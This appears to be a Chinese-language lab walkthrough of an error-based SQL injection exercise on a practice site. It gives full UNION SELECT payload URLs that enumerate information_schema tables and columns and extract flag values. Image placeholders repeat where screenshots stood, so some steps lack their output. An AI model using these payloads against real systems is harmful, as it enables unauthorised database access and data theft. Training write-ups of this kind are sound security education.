SQL注入-显错注入Rank 1

发布时间：2024-03-14 19:01

链接
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1

$\"SQL注入-显错注入Rank$ 1.首先找注入点：
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=2-1
id=2-1在数据库执行了，找到注入点
$\"SQL注入-显错注入Rank$
2.利用order by猜测字段数
如下，当order by 3能正常返回数据 order by 4无正常回显，说明字段数为3.
$\"SQL注入-显错注入Rank$ order by 4如下：
$\"SQL注入-显错注入Rank$
3.利用联合查询 union获取数据库信息
如下：回显在 2，3位置
$\"SQL注入-显错注入Rank$
3.1 接下来获取当前的数据库名：
当前数据库名为：error

$\"SQL注入-显错注入Rank$
3.2 接下来获取表名
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1
error_flag
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 1,2
user

获取error数据库两张表 error_flag,user
$\"SQL注入-显错注入Rank$

3.3 接下来获取字段名
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,2,column_name from information_schema.columns where table_name=‘error_flag’ and database()=‘error’ limit 0,1-- qwe
字段1：Id

$\"SQL注入-显错注入Rank$
字段2：flag
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,2,column_name from information_schema.columns where table_name=‘error_flag’ and database()=‘error’ limit 1,2-- qwe

$\"SQL注入-显错注入Rank$
字段3:木有
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,2,column_name from information_schema.columns where table_name=‘error_flag’ and database()=‘error’ limit 2,3-- qwe

$\"SQL注入-显错注入Rank$
3.4 获取error_flag表的数据
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,2,flag from error_flag limit 0,1-- qwe
zKaQ-NF

$\"SQL注入-显错注入Rank$
http://inject2b.lab.aqlab.cn:81/Pass-01/index.php?id=1 and 1=2 union select 1,2,flag from error_flag limit 1,2-- qwe

zKaQ-XiaoFang
$\"SQL注入-显错注入Rank$

SQL注入-显错注入Rank 1

相关推荐